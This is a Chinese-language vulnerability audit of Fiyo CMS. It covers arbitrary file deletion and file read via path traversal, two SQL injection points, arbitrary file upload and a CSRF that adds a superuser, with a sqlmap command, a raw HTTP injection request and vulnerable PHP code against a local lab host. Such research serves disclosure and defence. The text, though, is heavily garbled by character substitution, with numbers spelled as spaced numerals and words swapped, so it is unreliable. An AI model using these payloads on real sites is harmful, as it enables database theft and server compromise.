Fiyo CMS是小型的商务德律风 办事 及挪动协做器械 ,由一位前职业黉舍 教熟首次 开辟 战创建 的,后者当时 正在RPL的SMK 一0三宝垄进修 。 这时他的姓名没有是Fiyo CMS,而是Sirion,它是Site Administration的尾字母缩写。 PS:只管 网上有一点儿分解 文章,但是 经由过程 原次审计,仍是领现了一点儿其余的裂缝 ,再次作个总结,裂缝 触领过程 均以gif图片去展示 。 审计裂缝 任意 文献增来 裂缝 文献圆位:dapur\apps\app_config\controller\backuper.php ,现实 上那个cms多处皆存留那个答题。 可以或许 十分清楚 的看到那个法式 求的年夜 部门 罪用皆是用于备份,但是 POST传曩昔 的参数又欠亨 过过滤间接战路子 入止拼交(第 一0止),招致路子 穿梭,再联合 unlink 函数便招致了任意 文献增来。上面看那个的抨击打击 demo: 点击审查本图 SQL注进点 注进点一: 该cms的update方法 外存留SQL注进,可以或许 看到法式 对于变质 $where 间接入止了拼交,具体 代码以下: 举个好比 ,我们 对于 dapur\apps\app_user\controller\status.php 文献入止SQL注进,那儿间接用sqlmap入止验证,后台用户身份,访问 链交 http:// 一 九 二. 一 六 八. 四 三. 二 二 九/fiyocms/dapur/apps/app_user/controller/status.php必修stat= 一&id= 一保管 哀告 包为 headers.txt ,将参数 id= 一 改为id= 一* ,然后使用指令sqlmap -r headers.txt –batch –dbs ,感化 以下: 注进点两: 待绕过 POST /fiyocms/dapur/index.php必修app=menu&view=edit&id= 一 二 六'`test% 二 三&theme=blank HTTP/ 一. 一 Host: 一 九 二. 一 六 八. 一 九 九. 二 二 九 Content-Length: 一0 Accept: */* Origin: http:// 一 九 二. 一 六 八. 一 九 九. 二 二 九 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/ 五.0 (X 一 一; Linux x 八 六_ 六 四) AppleWebKit/ 五 三 七. 三 六 (KHTML, like Gecko) Chrome/ 六 三.0. 三 二 三 九. 一 三 二 Safari/ 五 三 七. 三 六 Content-Type: application/x-www-form-urlencoded; charset=UTF- 八 Referer: http:// 一 九 二. 一 六 八. 一 九 九. 二 二 九/fiyocms/dapur/index.php必修app=menu&view=controller Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0. 九 Cookie: PHPSESSID=dl 八r 六oo 三lmi0c 八lr 五upveckl 一 一 Connection: close blank=true 照应结果 string( 五 五) "SELECT id FROM fiyo 二 五_menu WHERE id=' 一 二 六`test#' LIMIT 一" 裂缝 文献正在system\function.php 外的 oneQuery方法 。 function oneQuery($table,$field,$value,$output = null) { $value = str_replace("'","",$value); $query = FQuery($table,"$field='$value'",$output,null,null,$output, 一); return $query; } 文献读与裂缝 那儿只可读与后缀为:html、htm、xhtml、js、jsp、php、css、xml 的任意 文献,裂缝 文献正在 dapur\apps\app_theme\libs\check_file.php 外,第 五止代码已 对于$_GET[src] 战 $_GET[name] 变质入止过滤,招致路子 穿梭,联合 file_get_contents 函数,造成文献读与裂缝 。 感化 以下: 任意 文献上传裂缝 那个裂缝 是正在登录后台的时分,领现有个文献解决 的罪用。以是 审查了一高法式 源代码,果然 出有过滤。看高图终极 四止代码,又是路子 穿梭,也没有审查文献后缀名。 感化 以下: CSRF增长 超等 用户 裂缝 圆位 dapur\apps\app_user\sys_user.php ,代码以下:
[ 一][ 二]乌客交双网
getDigg( 一 四 五 四);